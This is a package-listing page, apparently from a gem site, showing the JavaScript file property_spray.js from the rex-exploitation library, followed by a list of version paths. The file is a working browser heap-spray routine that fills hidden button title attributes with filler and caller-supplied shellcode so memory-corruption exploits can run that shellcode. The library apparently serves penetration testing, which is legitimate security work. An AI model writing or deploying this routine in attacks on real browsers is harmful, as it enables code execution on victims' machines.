Sha256: 7069f82560de123a4c1faf649179d54298cbe045f298fd798dc40e7be00a2566

Contents?: true

Size: 1.19 KB

Versions: 30

Compression:

Stored size: 1.19 KB

Contents

var sym_div_container;
function sprayHeap( oArg ) {
  var shellcode     = oArg.shellcode;
  var offset        = oArg.offset;
  var heapBlockSize = oArg.heapBlockSize;
  var maxAllocs     = oArg.maxAllocs;
  var objId         = oArg.objId;

  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
  if (offset        == undefined)  { offset        = 0x00; }
  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }

  if (offset > 0x800) { throw "Bad alignment"; }

  sym_div_container = document.getElementById(objId);

  if (sym_div_container == null) {
    sym_div_container = document.createElement("div");
  }

  sym_div_container.style.cssText = "display:none";
  var data;
  foo = "%u2020%u2020";
  junk = unescape(foo);
  while (junk.length < offset+0x1000) junk += junk;

  data = junk.substring(0,offset) + shellcode;
  data += junk.substring(0,0x800-offset-shellcode.length);

  while (data.length < heapBlockSize) data += data;

  for (var i = 0; i < maxAllocs; i++)
  {
    var obj = document.createElement("button");
    obj.title = data.substring(0, (heapBlockSize-2)/2);
    sym_div_container.appendChild(obj);
  }
}

Version data entries

30 entries across 30 versions & 1 rubygems

Version Path
rex-exploitation-0.1.40 data/js/memory/property_spray.js
rex-exploitation-0.1.39 data/js/memory/property_spray.js
rex-exploitation-0.1.38 data/js/memory/property_spray.js
rex-exploitation-0.1.37 data/js/memory/property_spray.js
rex-exploitation-0.1.36 data/js/memory/property_spray.js
rex-exploitation-0.1.35 data/js/memory/property_spray.js
rex-exploitation-0.1.34 data/js/memory/property_spray.js
rex-exploitation-0.1.33 data/js/memory/property_spray.js
rex-exploitation-0.1.32 data/js/memory/property_spray.js
rex-exploitation-0.1.31 data/js/memory/property_spray.js
rex-exploitation-0.1.30 data/js/memory/property_spray.js
rex-exploitation-0.1.29 data/js/memory/property_spray.js
rex-exploitation-0.1.28 data/js/memory/property_spray.js
rex-exploitation-0.1.27 data/js/memory/property_spray.js
rex-exploitation-0.1.26 data/js/memory/property_spray.js
rex-exploitation-0.1.25 data/js/memory/property_spray.js
rex-exploitation-0.1.24 data/js/memory/property_spray.js
rex-exploitation-0.1.23 data/js/memory/property_spray.js
rex-exploitation-0.1.22 data/js/memory/property_spray.js
rex-exploitation-0.1.21 data/js/memory/property_spray.js